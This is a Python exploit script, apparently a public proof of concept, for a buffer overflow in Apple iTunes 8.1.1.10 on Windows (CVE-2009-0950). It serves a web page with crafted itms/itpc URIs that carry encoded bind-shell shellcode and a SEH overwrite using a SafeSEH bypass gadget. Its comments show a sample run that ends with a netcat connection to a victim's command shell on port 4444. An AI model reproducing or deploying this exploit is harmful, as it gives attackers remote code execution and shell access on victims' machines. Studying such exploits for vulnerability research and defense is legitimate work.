#!/usr/bin/python # Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit # Matteo Memelli | ryujin __A-T__ offensive-security.com # Spaghetti & Pwnsauce - 06/10/2009 www.offensive-security.com # CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03 # Vulnerability can't be exploited simply overwriting a return address on the # stack because of stack canary protection. Increasing buffer size leads to # SEH overwrite but it seems that the Access Violation needed to get our own # Exception Handler called is not always thrown. # So, to increase reliability, the exploit sends two URI to iTunes: # - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash) # - the 2nd payload fully overwrite SEH to 0wN EIP # Payloads must be encoded in order to obtain pure ASCII printable shellcode. # I could trigger the vulnerability from Firefox but not from IE that seems # to truncate the long URI. # Tested on Windows XP SP2/SP3 English, Firefox 3.0.10, # iTunes 8.1.1.10, 8.1.0.52 # # --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why # # ryujin:Desktop ryujin$ ./ipwn.py # [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950 # [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com # [+] www.offensive-security.com # [+] Spaghetti & Pwnsauce # [+] Listening on port 80 # [+] Connection accepted from: 172.16.30.7 # [+] Payload sent, wait 20 secs for iTunes error! # ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444 # Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded! # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Mozilla Firefox> from socket import * html = """ iTunes loading . . .

iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950

ryujin __ A-T __ offensive-security.com

www.offensive-security.com

iTunes starting... wait for 20 secs; if you get an error, click "Ok" in the MessageBox before checking for your shell on port 4444 :)
If victim host is not connected to the internet, exploit will fail unless iTunes is already opened and you disable "openiTunes" javascript function.

This exploit works if opened from Firefox not from IE!

After exploitation iTunes crashes, you need to kill it from TaskManager
have fun!

""" # Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar) # This is not standard Alpha2 bind shell. Beginning of shellcode is modified # in order to obtain register alignment and to reset ESP and EBP we mangled # before. Rest of decoded shellcode is Metasploit bind shell on port 4444 # EXITFUNC=thread # shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0" "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu" "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D" "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL" "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO" "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV" "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc" "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ" "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s" "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL" "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc" "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA") # Padding pad0x1 = "\x41"*425 # Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10 # Padding pad0x2 = "\x41"*570 # ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet # 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass) ret = "\x2a\x5e\x21\x67" # Let the dance begin... Point EBP to encoded jmp align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7 # Decode a NEAR JMP and JUMP BACK BABY! jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA" "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA") # Padding pad0x3 = "\x43"*162 # We send 2 payloads to iTunes: first is itms and second itpc # url1 smashes the stack in order to get an AV later url1 = "itms://:" + "\x41"*200 + "/" url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\ align_for_jmp + jmp_back + pad0x3 payload = html % (url1, url2) print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950" print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com" print "[+] www.offensive-security.com" print "[+] Spaghetti & Pwnsauce" s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 80)) s.listen(1) print "[+] Listening on port 80" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(payload) print "[+] Payload sent, wait 20 secs for iTunes error!" c.close() s.close()